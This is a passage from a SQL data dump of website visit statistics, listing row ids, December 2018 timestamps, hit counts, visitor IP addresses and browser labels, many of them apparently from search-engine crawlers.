,1,0,0,'46.229.168.153','other'),(349500,1544450290,1,1,0,0,'46.229.168.132','other'),(349501,1544450308,1,1,0,0,'5.45.207.19','other'),(349502,1544450656,1,1,0,0,'54.36.148.173','other'),(349503,1544450680,2,2,0,0,'91.196.178.133','firefox'),(349504,1544451598,1,1,0,0,'37.9.113.20','other'),(349505,1544451688,1,1,0,0,'54.36.148.188','other'),(349506,1544451942,2,2,0,0,'5.45.207.79','other'),(349507,1544451978,1,1,0,0,'91.196.178.53','chrome'),(349508,1544452443,2,2,0,0,'141.8.142.103','other'),(349509,1544452689,2,2,0,0,'5.45.207.19','other'),(349510,1544452690,3,3,0,0,'91.196.178.94','chrome'),(349511,1544452773,1,1,0,0,'54.36.148.196','other'),(349512,1544453212,1,1,0,0,'37.55.233.198','opera'),(349513,1544453237,1,1,0,0,'37.53.90.175','chrome'),(349514,1544453319,3,3,0,0,'178.154.244.11','other'),(349515,1544453389,1,1,0,0,'66.249.69.200','chrome'),(349516,1544453536,1,1,0,0,'46.229.168.145','other'),(349517,1544453660,1,1,0,0,'95.108.213.4','other'),(349518,1544453774,3,3,0,0,'87.250.224.47','other'),(349519,1544453985,2,2,0,0,'5.45.207.79','other'),(349520,1544454054,1,1,0,0,'54.36.149.26','other'),(349521,1544454110,1,1,0,0,'46.229.168.144','other'),(349522,1544454628,1,1,0,0,'54.36.148.89','other'),(349523,1544454716,1,1,0,0,'95.163.255.64','other'),(349524,1544454725,1,1,0,0,'95.163.255.68','other'),(349526,1544454745,1,1,0,0,'141.8.142.103','other'),(349527,1544454746,1,1,0,0,'37.55.233.198','opera'),(349528,1544454925,1,1,0,0,'51.255.65.46','other'),(349529,1544455083,1,1,0,0,'185.93.61.2','chrome'),(349530,1544455093,1,1,0,0,'95.163.255.69','other'),(349531,1544455096,1,1,0,0,'95.163.255.67','other'),(349532,1544455224,1,1,0,0,'54.36.149.18','other'),(349533,1544455285,2,2,0,0,'46.229.168.130','other'),(349534,1544455406,1,1,0,0,'54.36.148.26','other'),(349535,1544455536,1,1,0,0,'66.249.75.17','chrome'),(349536,1544455538,1,1,0,0,'66.249.75.22','chrome'),(349537,1544455632,1,1,0,0,'5.45.207.19','other'),(349538,1544455782,1,1,0,0,'54.36.148.24','other'),(349539,1544455861,1,1,0,0,'37.9.113.20','other'),(349540,1544455863,1,1,0,0,'178.154.171.27','other'),(349541,1544455928,1,1,0,0,'54.36.149.103','other'),(349542,1544456111,1,1,0,0,'54.36.148.41','other'),(349543,1544456138,1,1,0,0,'185.93.61.2','chrome'),(349544,1544456174,1,1,0,0,'95.163.255.96','other'),(349545,1544456176,1,1,0,0,'95.163.255.94','other'),(349546,1544456428,1,1,0,0,'54.36.149.82','other'),(349547,1544456470,1,1,0,0,'178.154.171.24','other'),(349548,1544456474,1,1,0,0,'141.8.142.38','other'),(349550,1544456475,1,1,0,0,'141.8.142.144','other'),(349551,1544456561,1,1,0,0,'13.57.233.99','chrome'),(349552,1544456589,1,1,0,0,'54.36.148.135','other'),(349553,1544456752,1,1,0,0,'95.163.255.99','other'),(349554,1544456755,1,1,0,0,'95.163.255.97','other'),(349555,1544456938,2,2,0,0,'157.55.39.138','other'),(349556,1544457043,1,1,0,0,'37.55.233.198','msie'),(349557,1544457047,1,1,0,0,'185.93.61.2','chrome'),(349558,1544457182,1,1,0,0,'37.9.113.148','other'),(349559,1544457224,1,1,0,0,'54.36.149.27','other'),(349560,1544457381,1,1,0,0,'54.36.148.187','other'),(349561,1544457382,1,1,0,0,'46.229.168.143','other'),(349562,1544457392,1,1,0,0,'54.36.148.28','other'),(349563,1544457394,1,1,0,0,'46.229.168.142','other'),(349564,1544457507,1,1,0,0,'54.36.149.87','other'),(349565,1544457551,1,1,0,0,'54.36.148.208','other'),(349566,1544457690,1,1,0,0,'54.36.148.196','other'),(349567,1544458187,1,1,0,0,'54.36.148.16','other'),(349568,1544458502,1,1,0,0,'46.229.168.142','other'),(349569,1544458592,1,1,0,0,'157.55.39.149','other'),(349570,1544458835,1,1,0,0,'8.29.198.26','other'),(349571,1544458881,1,1,0,0,'8.29.198.27','other'),(349572,1544459072,2,2,0,0,'46.200.239.210','firefox'),(349573,1544459481,1,1,0,0,'54.36.148.68','other'),(349574,1544459638,1,1,0,0,'176.36.88.154','firefox'),(349575,1544459974,1,1,0,0,'54.36.148.41','other'),(349576,1544459982,1,1,0,0,'46.229.168.142','other'),(349577,1544460090,1,1,0,0,'54.36.148.29','other'),(349578,1544460130,1,1,0,0,'157.55.39.138','other'),(349579,1544460150,1,1,0,0,'54.36.148.119','other'),(349580,1544460240,1,1,0,0,'54.36.148.210','other'),(349581,1544460497,1,1,0,0,'54.36.148.62','other'),(349582,1544460591,1,1,0,0,'46.229.168.146','other'),(349583,1544460637,1,0,1,0,'66.249.75.15',''),(349584,1544460641,1,0,1,0,'66.249.75.22',''),(349585,1544460649,1,1,0,0,'54.36.148.80','other'),(349586,1544460768,1,1,0,0,'54.36.148.83','other'),(349587,1544460901,1,1,0,0,'66.249.75.20','chrome'),(349588,1544460955,1,1,0,0,'54.36.148.25','other'),(349589,1544461161,1,1,0,0,'46.211.210.202','chrome'),(349590,1544461300,1,1,0,0,'54.36.148.146','other'),(349591,1544461443,1,1,0,0,'66.249.69.217','chrome'),(349592,1544461446,1,1,0,0,'66.249.69.200','chrome'),(349593,1544461518,1,1,0,0,'46.229.168.148','other'),(349594,1544461606,1,1,0,0,'207.46.13.83','other'),(349595,1544461769,1,1,0,0,'46.229.168.142','other'),(349596,1544462087,1,1,0,0,'195.69.223.157','chrome'),(349597,1544462513,1,1,0,0,'157.55.39.149','other'),(349598,1544462605,1,0,1,0,'66.249.69.219',''),(349599,1544462606,1,1,0,0,'95.163.255.95','other'),(349600,1544462609,1,1,0,0,'95.163.255.97','other'),(349601,1544462647,1,0,1,0,'66.249.69.202',''),(349602,1544462847,1,1,0,0,'54.36.149.36','other'),(349603,1544463679,1,1,0,0,'46.229.168.142','other'),(349604,1544463682,2,2,0,0,'46.229.168.133','other'),(349605,1544463899,1,1,0,0,'82.145.209.122','other'),(349606,1544464015,3,3,0,0,'46.211.131.251','chrome'),(349607,1544464090,1,1,0,0,'46.229.168.129','other'),(349608,1544464106,3,3,0,0,'157.55.39.149','other'),(349609,1544464129,1,1,0,0,'46.229.168.136','other'),(349610,1544464292,1,1,0,0,'180.76.15.150','other'),(349611,1544464293,1,1,0,0,'180.76.15.160','other'),(349612,1544464312,2,2,0,0,'178.95.156.179','chrome'),(349613,1544464766,1,1,0,0,'46.229.168.137','other'),(349614,1544464777,1,1,0,0,'46.229.168.142','other'),(349615,1544464988,1,1,0,0,'54.36.149.35','other'),(349616,1544465096,1,1,0,0,'95.28.177.221','chrome'),(349617,1544465335,2,2,0,0,'91.196.178.75','firefox'),(349618,1544465385,1,1,0,0,'54.36.148.51','other'),(349619,1544466339,1,1,0,0,'157.55.39.149','other'),(349620,1544466455,1,1,0,0,'54.36.149.32','other'),(349621,1544466498,2,2,0,0,'195.69.223.157','chrome'),(349622,1544466935,1,1,0,0,'54.36.148.212','other'),(349623,1544466940,1,1,0,0,'46.229.168.148','other'),(349624,1544466953,1,1,0,0,'54.36.148.31','other'),(349625,1544466964,1,1,0,0,'46.229.168.138','other'),(349626,1544466998,1,1,0,0,'54.36.148.26','other'),(349627,1544467404,1,1,0,0,'157.55.39.149','other'),(349628,1544467628,1,1,0,0,'46.229.168.132','other'),(349629,1544467639,1,1,0,0,'46.229.168.136','other'),(349630,1544467683,4,4,0,0,'46.200.239.210','firefox'),(349631,1544467832,2,2,0,0,'54.36.148.60','other'),(349632,1544467876,1,1,0,0,'54.36.148.53','other'),(349633,1544468127,1,1,0,0,'95.163.255.96','other'),(349634,1544468130,1,1,0,0,'95.163.255.93','other'),(349635,1544468257,1,1,0,0,'66.249.75.16','chrome'),(349636,1544468264,1,1,0,0,'66.249.75.21','chrome'),(349637,1544468855,2,2,0,0,'95.163.255.103','other'),(349638,1544468864,2,2,0,0,'95.163.255.105','other'),(349639,1544468875,4,4,0,0,'95.163.255.117','other'),(349640,1544468897,2,2,0,0,'95.163.255.102','other'),(349641,1544468934,1,1,0,0,'95.163.255.104','other'),(349642,1544468958,2,2,0,0,'95.163.255.113','other'),(349643,1544468969,1,1,0,0,'95.163.255.116','other'),(349644,1544468985,2,2,0,0,'95.163.255.109','other'),(349645,1544469046,1,1,0,0,'95.163.255.106','other'),(349646,1544469059,1,1,0,0,'95.163.255.108','other'),(349647,1544469087,1,1,0,0,'95.163.255.115','other'),(349648,1544469099,1,1,0,0,'95.163.255.114','other'),(349649,1544469137,2,2,0,0,'46.229.168.136','other'),(349650,1544469185,1,1,0,0,'157.55.39.138','other'),(349651,1544469237,1,1,0,0,'54.36.148.77','other'),(349652,1544469343,2,2,0,0,'91.196.178.176','chrome'),(349653,1544469363,1,1,0,0,'54.36.149.3','other'),(349654,1544469692,1,1,0,0,'8.29.198.25','other'),(349655,1544469709,1,1,0,0,'46.229.168.150','other'),(349656,1544469741,1,1,0,0,'8.29.198.27','other'),(349657,1544469748,1,1,0,0,'66.249.75.21','chrome'),(349658,1544470074,3,3,0,0,'5.45.207.79','other'),(349659,1544470100,2,2,0,0,'178.154.244.11','other'),(349660,1544470189,5,5,0,0,'5.45.207.19','other'),(349661,1544470190,1,1,0,0,'54.36.148.117','other'),(349662,1544470192,1,1,0,0,'87.250.224.47','other'),(349663,1544470629,1,1,0,0,'95.108.213.4','other'),(349664,1544470749,1,1,0,0,'141.8.142.103','other'),(349665,1544471018,4,4,0,0,'178.154.244.11','other'),(349666,1544471047,1,1,0,0,'157.55.39.149','other'),(349667,1544471267,3,3,0,0,'5.45.207.79','other'),(349668,1544471363,1,1,0,0,'46.229.168.149','other'),(349669,1544471550,2,2,0,0,'185.234.218.42','msie'),(349670,1544471617,3,3,0,0,'95.108.213.4','other'),(349671,1544471630,1,1,0,0,'54.36.148.186','other'),(349672,1544471704,2,2,0,0,'141.8.142.103','other'),(349673,1544471708,1,1,0,0,'54.36.148.226','other'),(349674,1544471812,2,2,0,0,'5.45.207.19','other'),(349675,1544472025,1,1,0,0,'157.55.39.149','other'),(349676,1544472027,4,4,0,0,'178.154.244.11','other'),(349677,1544472030,1,1,0,0,'66.249.75.15','chrome'),(349678,1544472049,1,1,0,0,'66.249.75.20','chrome'),(349679,1544472237,1,1,0,0,'91.196.178.177','chrome'),(349680,1544472241,1,1,0,0,'54.36.148.177','other'),(349681,1544472263,1,1,0,0,'37.9.113.20','other'),(349682,1544472456,1,1,0,0,'54.36.148.227','other'),(349683,1544472672,2,2,0,0,'141.8.142.103','other'),(349684,1544472688,1,1,0,0,'66.249.69.219','chrome'),(349685,1544472710,1,1,0,0,'66.249.69.202','chrome'),(349686,1544472801,3,3,0,0,'95.108.213.4','other'),(349687,1544472991,2,2,0,0,'5.45.207.79','other'),(349688,1544473005,1,1,0,0,'37.9.113.103','other'),(349689,1544473125,1,1,0,0,'5.45.207.19','other'),(349690,1544473134,2,2,0,0,'66.249.75.15','chrome'),(349691,1544473199,2,2,0,0,'66.249.75.21','chrome'),(349692,1544473641,1,1,0,0,'178.154.244.11','other'),(349693,1544474009,1,1,0,0,'46.229.168.134','other'),(349694,1544474034,1,1,0,0,'193.161.15.117','other'),(349695,1544474229,1,1,0,0,'54.36.148.131','other'),(349696,1544474677,1,1,0,0,'54.36.148.201','other'),(349697,1544474744,1,1,0,0,'54.36.149.99','other'),(349698,1544475594,1,1,0,0,'66.249.75.17','chrome'),(349699,1544475642,1,1,0,0,'66.249.75.20','chrome'),(349700,1544477164,1,1,0,0,'46.229.168.149','other'),(349701,1544477256,1,1,0,0,'54.36.149.43','other'),(349702,1544477267,2,2,0,0,'77.222.156.20','firefox'),(349703,1544477455,1,1,0,0,'54.36.148.223','other'),(349704,1544477548,1,1,0,0,'54.36.148.244','other'),(349705,1544477890,1,1,0,0,'46.229.168.153','other'),(349706,1544477991,1,1,0,0,'66.249.75.16','chrome'),(349707,1544478003,1,1,0,0,'66.249.75.22','chrome'),(349708,1544478237,1,1,0,0,'54.36.148.17','other'),(349709,1544478391,1,1,0,0,'54.36.149.1','other'),(349710,1544478588,2,2,0,0,'46.229.168.147','other'),(349711,1544478923,2,2,0,0,'157.55.39.149','other'),(349712,1544479028,1,1,0,0,'54.36.148.108','other'),(349713,1544479141,1,1,0,0,'46.229.168.133','other'),(349714,1544479409,1,1,0,0,'46.229.168.151','other'),(349715,1544479499,1,1,0,0,'46.229.168.143','other'),(349716,1544479534,1,1,0,0,'54.36.148.39','other'),(349717,1544479700,1,1,0,0,'54.36.148.143','other'),(349718,1544479737,1,1,0,0,'54.36.148.233','other'),(349719,1544479743,1,1,0,0,'66.249.75.16','chrome'),(349720,1544479790,1,1,0,0,'66.249.75.21','chrome'),(349721,1544479798,2,2,0,0,'212.90.61.52','firefox'),(349722,1544479895,1,1,0,0,'66.249.69.202','chrome'),(349723,1544479990,1,1,0,0,'54.36.149.104','other'),(349724,1544480184,1,1,0,0,'46.229.168.148','other'),(349725,1544480228,1,1,0,0,'54.36.148.229','other'),(349726,1544480245,1,1,0,0,'66.249.69.204','chrome'),(349727,1544480302,3,3,0,0,'54.165.59.7','other'),(349728,1544480547,1,1,0,0,'8.29.198.26','other'),(349729,1544480593,1,1,0,0,'8.29.198.27','other'),(349730,1544480601,1,1,0,0,'54.36.148.85','other'),(349731,1544480668,1,1,0,0,'54.36.148.20','other'),(349732,1544480694,1,1,0,0,'54.36.148.108','other'),(349733,1544480756,1,1,0,0,'46.229.168.146','other'),(349734,1544480892,1,1,0,0,'54.36.148.17','other'),(349735,1544481053,1,1,0,0,'54.36.149.50','other'),(349736,1544481054,1,1,0,0,'54.36.149.97','other'),(349737,1544481190,1,1,0,0,'54.36.148.228','other'),(349738,1544481936,1,1,0,0,'54.36.148.252','other'),(349739,1544482929,1,1,0,0,'46.229.168.146','other'),(349740,1544483009,1,1,0,0,'91.207.105.26','chrome'),(349741,1544483151,1,1,0,0,'54.36.149.74','other'),(349742,1544483267,1,1,0,0,'77.111.244.18','chrome'),(349743,1544483370,1,1,0,0,'95.108.213.4','other'),(349744,1544483374,1,1,0,0,'5.45.207.19','other'),(349745,1544484045,1,1,0,0,'54.36.148.216','other'),(349746,1544484235,1,1,0,0,'54.36.148.62','other'),(349747,1544485206,1,1,0,0,'54.36.148.94','other'),(349748,1544485217,1,1,0,0,'207.46.13.12','other'),(349749,1544485628,1,1,0,0,'54.36.148.252','other'),(349750,1544485692,1,1,0,0,'54.36.149.9','other'),(349751,1544486189,3,3,0,0,'178.154.244.11','other'),(349752,1544486196,1,1,0,0,'5.45.207.79','other'),(349753,1544486214,1,1,0,0,'54.36.149.62','other'),(349754,1544486692,1,1,0,0,'66.249.75.17','chrome'),(349755,1544486742,1,1,0,0,'66.249.75.20','chrome'),(349756,1544486859,1,1,0,0,'93.190.138.231','firefox'),(349757,1544487152,1,1,0,0,'66.249.75.21','chrome'),(349758,1544487164,1,1,0,0,'66.249.69.221','chrome'),(349759,1544487205,1,1,0,0,'66.249.69.204','chrome'),(349760,1544487244,1,1,0,0,'40.77.167.88','other'),(349761,1544487872,1,1,0,0,'54.36.149.8','other'),(349762,1544488184,1,1,0,0,'46.229.168.151','other'),(349763,1544488572,1,1,0,0,'54.36.148.111','other'),(349764,1544488778,1,1,0,0,'66.249.75.20','chrome'),(349765,1544489039,1,1,0,0,'54.36.148.188','other'),(349766,1544489246,1,1,0,0,'54.36.148.137','other'),(349767,1544489712,1,1,0,0,'40.77.167.88','other'),(349768,1544489740,1,1,0,0,'54.36.149.73','other'),(349769,1544489768,1,1,0,0,'87.120.36.157','other'),(349770,1544490563,1,1,0,0,'95.163.255.97','other'),(349771,1544490566,1,1,0,0,'95.163.255.93','other'),(349772,1544490850,1,1,0,0,'54.36.149.69','other'),(349773,1544490878,1,1,0,0,'207.46.13.97','other'),(349774,1544491097,1,1,0,0,'40.77.167.88','other'),(349775,1544491154,1,1,0,0,'66.249.69.217','chrome'),(349776,1544491177,1,1,0,0,'66.249.69.202','chrome'),(349777,1544491228,1,1,0,0,'40.77.167.103','other'),(349778,1544491388,1,1,0,0,'8.29.198.27','other'),(349779,1544491441,1,1,0,0,'8.29.198.26','other'),(349780,1544491842,1,1,0,0,'54.36.148.170','other'),(349781,1544491878,1,1,0,0,'54.36.149.76','other'),(349782,1544492240,1,1,0,0,'54.36.148.153','other'),(349783,1544492807,1,1,0,0,'46.229.168.133','other'),(349784,1544492818,1,1,0,0,'46.229.168.146','other'),(349785,1544493009,1,1,0,0,'66.249.75.20','chrome'),(349786,1544493069,1,1,0,0,'66.249.75.15','chrome'),(349787,1544493126,2,2,0,0,'66.249.75.21','chrome'),(349788,1544493130,1,1,0,0,'54.36.149.3','other'),(349789,1544493207,1,1,0,0,'141.8.142.103','other'),(349791,1544493208,1,1,0,0,'95.108.213.4','other'),(349793,1544493252,1,1,0,0,'66.249.69.204','chrome'),(349794,1544493387,1,1,0,0,'66.249.75.17','chrome'),(349795,1544493449,1,1,0,0,'46.229.168.138','other'),(349796,1544493556,1,1,0,0,'207.46.13.33','other'),(349797,1544493653,1,1,0,0,'54.36.148.133','other'),(349798,1544493759,1,1,0,0,'54.36.148.72','other'),(349799,1544494319,1,1,0,0,'54.36.148.76','other'),(349800,1544494633,1,1,0,0,'46.229.168.147','other'),(349801,1544494715,1,1,0,0,'66.249.69.217','chrome'),(349802,1544494723,1,1,0,0,'66.249.69.202','chrome'),(349803,1544494794,1,1,0,0,'66.249.75.16','chrome'),(349804,1544494803,1,1,0,0,'66.249.75.21','chrome'),(349805,1544495784,1,1,0,0,'54.36.148.254','other'),(349806,1544496203,3,3,0,0,'66.249.75.15','chrome'),(349807,1544496229,1,1,0,0,'66.249.75.20','chrome'),(349808,1544496257,2,2,0,0,'157.55.39.94','other'),(349809,1544496321,1,1,0,0,'54.36.148.40','other'),(349810,1544496348,2,2,0,0,'66.249.75.21','chrome'),(349811,1544496466,1,1,0,0,'157.55.39.241','other'),(349812,1544496766,2,2,0,0,'34.212.76.94','chrome'),(349813,1544496779,1,1,0,0,'207.46.13.242','other'),(349814,1544497242,1,1,0,0,'54.36.149.60','other'),(349815,1544497667,1,1,0,0,'54.36.149.22','other'),(349816,1544497816,1,1,0,0,'66.249.69.219','chrome'),(349817,1544497864,1,1,0,0,'54.36.148.48','other'),(349818,1544497874,1,1,0,0,'66.249.69.202','chrome'),(349819,1544497999,1,1,0,0,'207.46.13.33','other'),(349820,1544498238,1,1,0,0,'54.36.148.74','other'),(349821,1544498710,1,1,0,0,'54.36.148.13','other'),(349822,1544499071,1,1,0,0,'157.55.39.94','other'),(349823,1544499395,1,1,0,0,'54.36.148.59','other'),(349824,1544500461,1,1,0,0,'95.163.255.94','other'),(349825,1544500465,1,1,0,0,'95.163.255.98','other'),(349826,1544500640,1,1,0,0,'54.36.149.52','other'),(349827,1544500710,1,1,0,0,'54.36.148.251','other'),(349828,1544501155,1,1,0,0,'54.36.148.117','other'),(349829,1544501298,1,1,0,0,'95.163.255.92','other'),(349830,1544501300,1,1,0,0,'95.163.255.99','other'),(349831,1544501591,1,1,0,0,'66.249.75.16','chrome'),(349832,1544501595,1,1,0,0,'66.249.75.20','chrome'),(349833,1544501768,1,1,0,0,'46.229.168.134','other'),(349834,1544501799,1,1,0,0,'46.229.168.143','other'),(349835,1544502033,1,1,0,0,'54.36.148.21','other'),(349836,1544502235,2,2,0,0,'8.29.198.27','other'),(349837,1544502247,2,2,0,0,'5.45.207.19','other'),(349838,1544502256,1,1,0,0,'46.211.148.167','chrome'),(349839,1544502273,1,1,0,0,'157.55.39.241','other'),(349840,1544502367,4,4,0,0,'5.45.207.79','other'),(349841,1544502377,2,2,0,0,'178.154.244.11','other'),(349842,1544502452,1,1,0,0,'157.55.39.94','other'),(349843,1544502467,1,1,0,0,'178.154.171.17','other'),(349844,1544502517,1,1,0,0,'213.180.203.53','other'),(349845,1544502528,2,2,0,0,'141.8.142.108','other'),(349846,1544502744,1,1,0,0,'178.154.200.48','other'),(349847,1544502890,1,1,0,0,'54.36.149.37','other'),(349848,1544502993,1,1,0,0,'95.108.213.50','other'),(349849,1544503011,1,1,0,0,'141.8.183.23','other'),(349850,1544503014,1,1,0,0,'178.154.244.49','other'),(349851,1544503086,1,1,0,0,'54.36.148.186','other'),(349852,1544503117,1,1,0,0,'46.229.168.150','other'),(349853,1544503119,1,1,0,0,'54.36.148.98','other'),(349854,1544503228,2,2,0,0,'87.250.224.47','other'),(349855,1544503266,5,5,0,0,'141.8.142.103','other'),(349856,1544503308,1,1,0,0,'54.36.149.18','other'),(349857,1544503489,2,2,0,0,'5.45.207.19','other'),(349858,1544503492,1,1,0,0,'95.108.213.4','other'),(349859,1544503494,5,5,0,0,'178.154.244.11','other'),(349860,1544503636,1,1,0,0,'213.180.203.9','other'),(349861,1544503771,1,1,0,0,'87.250.224.65','other'),(349862,1544503973,2,2,0,0,'5.45.207.79','other'),(349863,1544504145,1,1,0,0,'157.55.39.117','other'),(349864,1544504287,1,1,0,0,'157.55.39.241','other'),(349865,1544504384,1,1,0,0,'141.8.142.144','other'),(349866,1544504385,1,1,0,0,'141.8.142.191','other'),(349867,1544504499,3,3,0,0,'178.154.244.11','other'),(349868,1544504645,3,3,0,0,'5.45.207.19','other'),(349869,1544504752,2,2,0,0,'95.108.213.4','other'),(349870,1544504786,1,1,0,0,'213.180.203.40','other'),(349871,1544504918,1,1,0,0,'46.229.168.154','other'),(349872,1544505070,1,1,0,0,'37.55.233.198','msie'),(349873,1544505085,1,1,0,0,'141.8.142.103','other'),(349874,1544505271,1,1,0,0,'46.229.168.151','other'),(349875,1544505306,2,2,0,0,'5.45.207.79','other'),(349876,1544505414,3,3,0,0,'178.154.244.11','other'),(349877,1544505416,1,1,0,0,'54.36.149.78','other'),(349878,1544505493,1,1,0,0,'54.36.149.32','other'),(349879,1544505795,1,1,0,0,'54.36.148.39','other'),(349880,1544507152,2,2,0,0,'54.36.148.57','other'),(349881,1544507282,1,1,0,0,'90.188.255.142','chrome'),(349882,1544507664,1,1,0,0,'54.36.149.72','other'),(349883,1544507673,1,1,0,0,'54.36.149.52','other'),(349884,1544507906,1,1,0,0,'54.36.148.181','other'),(349885,1544508152,1,1,0,0,'209.17.96.210','other'),(349886,1544508414,1,1,0,0,'54.36.148.22','other'),(349887,1544508921,1,1,0,0,'157.55.39.241','other'),(349888,1544509072,1,1,0,0,'54.165.59.7','other'),(349889,1544509093,1,1,0,0,'157.55.39.117','other'),(349890,1544509274,1,1,0,0,'5.45.207.79','other'),(349891,1544509366,6,6,0,0,'193.32.71.249','chrome'),(349892,1544509601,2,2,0,0,'157.55.39.94','other'),(349893,1544509874,1,1,0,0,'54.36.148.138','other'),(349894,1544510121,1,1,0,0,'46.229.168.132','other'),(349895,1544510191,1,1,0,0,'54.36.148.131','other'),(349896,1544510226,1,1,0,0,'95.163.255.184','other'),(349897,1544510229,1,1,0,0,'54.36.148.139','other'),(349898,1544510230,1,1,0,0,'95.163.255.167','other'),(349899,1544510502,1,1,0,0,'207.46.13.242','other'),(349900,1544510529,1,1,0,0,'46.229.168.154','other'),(349901,1544510851,20,20,0,0,'136.243.151.90','other'),(349902,1544511046,1,1,0,0,'37.55.233.198','opera'),(349903,1544511167,1,1,0,0,'66.249.69.145','chrome'),(349904,1544511182,1,1,0,0,'66.249.75.22','chrome'),(349905,1544511252,1,1,0,0,'178.255.215.94','other'),(349906,1544511527,1,1,0,0,'54.36.149.32','other'),(349907,1544511687,1,1,0,0,'54.36.148.167','other'),(349908,1544511700,3,3,0,0,'66.249.69.144','chrome'),(349909,1544511705,8,8,0,0,'66.249.69.148','chrome'),(349910,1544511714,3,3,0,0,'66.249.69.143','chrome'),(349911,1544511756,6,6,0,0,'136.243.151.90','other'),(349912,1544511923,1,1,0,0,'66.249.69.150','chrome'),(349913,1544512001,1,1,0,0,'54.36.149.59','other'),(349914,1544512074,1,1,0,0,'46.229.168.150','other'),(349915,1544512091,1,1,0,0,'66.249.69.149','chrome'),(349916,1544512193,1,1,0,0,'46.229.168.148','other'),(349917,1544512334,1,1,0,0,'66.249.69.145','chrome'),(349918,1544512744,1,1,0,0,'54.36.148.111','other'),(349919,1544513059,1,1,0,0,'54.36.148.129','other'),(349920,1544513099,1,1,0,0,'8.29.198.27','other'),(349921,1544513141,1,1,0,0,'8.29.198.26','other'),(349922,1544513247,3,3,0,0,'66.249.69.143','chrome'),(349923,1544513274,1,1,0,0,'66.249.69.148','chrome'),(349924,1544513304,2,2,0,0,'66.249.69.149','chrome'),(349925,1544513320,2,2,0,0,'91.196.178.67','chrome'),(349926,1544513456,1,1,0,0,'46.229.168.148','other'),(349927,1544513505,1,1,0,0,'46.229.168.136','other'),(349928,1544513585,1,1,0,0,'40.77.167.71','other'),(349929,1544513681,1,1,0,0,'91.196.178.35','opera'),(349930,1544513832,1,1,0,0,'66.249.69.150','chrome'),(349931,1544514254,2,2,0,0,'157.55.39.241','other'),(349932,1544514412,2,2,0,0,'66.249.69.144','chrome'),(349933,1544514416,1,1,0,0,'54.36.149.40','other'),(349934,1544514433,2,2,0,0,'66.249.69.148','chrome'),(349935,1544514599,24,24,0,0,'85.10.207.195','other'),(349936,1544514618,3,3,0,0,'91.196.178.175','chrome'),(349937,1544514874,1,1,0,0,'54.36.148.47','other'),(349938,1544515262,2,2,0,0,'157.55.39.150','other'),(349939,1544515340,4,4,0,0,'5.9.73.27','other'),(349940,1544515684,2,2,0,0,'91.196.178.68','firefox'),(349941,1544515741,2,2,0,0,'37.55.64.217','chrome'),(349942,1544515998,1,1,0,0,'46.229.168.144','other'),(349943,1544516077,1,1,0,0,'54.36.148.230','other'),(349944,1544516264,1,1,0,0,'91.196.178.35','opera'),(349945,1544516291,350,350,0,0,'88.198.33.145','other'),(349946,1544516657,1,1,0,0,'66.249.69.221','chrome'),(349947,1544516683,1,1,0,0,'66.249.69.200','chrome'),(349948,1544516750,1,1,0,0,'46.229.168.137','other'),(349949,1544516888,2,2,0,0,'91.196.178.94','chrome'),(349950,1544517185,2,2,0,0,'95.108.213.4','other'),(349951,1544517208,2,2,0,0,'66.249.69.143','chrome'),(349952,1544517227,2,2,0,0,'66.249.69.148','chrome'),(349953,1544517243,1,1,0,0,'54.165.59.7','other'),(349954,1544517292,4,4,0,0,'178.154.244.11','other'),(349955,1544517386,2,2,0,0,'66.249.69.145','chrome'),(349956,1544517406,1,1,0,0,'66.249.69.149','chrome'),(349957,1544517421,1,1,0,0,'54.36.148.120','other'),(349958,1544517429,3,3,0,0,'66.249.69.150','chrome'),(349959,1544517459,1,1,0,0,'46.229.168.132','other'),(349960,1544517479,2,2,0,0,'141.8.142.103','other'),(349961,1544517553,1,1,0,0,'178.95.246.220','chrome'),(349962,1544517561,1,1,0,0,'54.36.148.25','other'),(349963,1544517562,1,1,0,0,'5.45.207.79','other'),(349964,1544517578,2,2,0,0,'5.45.207.19','other'),(349965,1544517684,2,2,0,0,'46.229.168.150','other'),(349966,1544517719,1,1,0,0,'66.249.69.144','chrome'),(349968,1544518017,1,1,0,0,'91.196.178.35','opera'),(349969,1544518183,1,1,0,0,'54.36.148.108','other'),(349970,1544518246,1,1,0,0,'46.229.168.134','other'),(349971,1544518344,1,1,0,0,'46.229.168.137','other'),(349972,1544518466,1,1,0,0,'66.249.69.150','chrome'),(349973,1544519021,3,3,0,0,'5.45.207.79','other'),(349974,1544519346,1,1,0,0,'178.154.244.11','other'),(349975,1544519472,2,2,0,0,'5.45.207.19','other'),(349976,1544519473,1,1,0,0,'141.8.142.103','other'),(349977,1544519668,1,1,0,0,'91.196.178.67','chrome'),(349978,1544519784,2,2,0,0,'91.196.178.94','chrome'),(349979,1544519859,1,1,0,0,'66.249.69.144','chrome'),(349981,1544519865,1,1,0,0,'66.249.69.143','chrome'),(349982,1544519866,2,2,0,0,'66.249.69.148','chrome'),(349983,1544520190,1,1,0,0,'46.229.168.153','other'),(349984,1544520277,1,1,0,0,'54.36.148.67','other'),(349985,1544520445,1,1,0,0,'157.55.39.241','other'),(349986,1544520741,1,1,0,0,'46.229.168.150','other'),(349987,1544520751,1,1,0,0,'46.229.168.145','other'),(349988,1544520820,1,1,0,0,'23.254.47.181','firefox'),(349989,1544520899,1,1,0,0,'54.36.148.222','other'),(349990,1544521056,1,1,0,0,'46.229.168.133','other'),(349991,1544521153,2,2,0,0,'195.230.119.58','chrome'),(349992,1544521164,1,1,0,0,'66.249.69.144','chrome'),(349993,1544521165,3,3,0,0,'66.249.69.149','chrome'),(349994,1544521310,1,1,0,0,'54.36.149.100','other'),(349995,1544521588,1,1,0,0,'66.249.69.145','chrome'),(349996,1544521857,1,1,0,0,'141.8.142.103','other'),(349997,1544521914,1,1,0,0,'66.249.69.148','chrome'),(349998,1544522176,1,1,0,0,'54.36.148.109','other'),(349999,1544522241,1,1,0,0,'37.73.48.16','chrome'),(350000,1544522336,2,2,0,0,'195.69.177.223','chrome'),(350001,1544522407,1,1,0,0,'54.36.148.217','other'),(350002,1544522537,2,2,0,0,'66.249.69.149','chrome'),(350003,1544522588,2,2,0,0,'66.249.69.143','chrome'),(350004,1544522771,1,1,0,0,'54.36.148.169','other'),(350005,1544522906,1,1,0,0,'66.249.69.148','chrome'),(350006,1544523351,1,1,0,0,'54.36.149.40','other'),(350007,1544523375,1,1,0,0,'54.36.148.54','other'),(350008,1544523412,2,2,0,0,'91.196.178.68','firefox'),(350009,1544523527,1,1,0,0,'46.229.168.150','other'),(350010,1544523635,1,1,0,0,'66.249.69.145','chrome'),(350011,1544523636,1,1,0,0,'66.249.69.149','chrome'),(350012,1544523958,1,1,0,0,'8.29.198.26','other'),(350013,1544523990,1,1,0,0,'8.29.198.27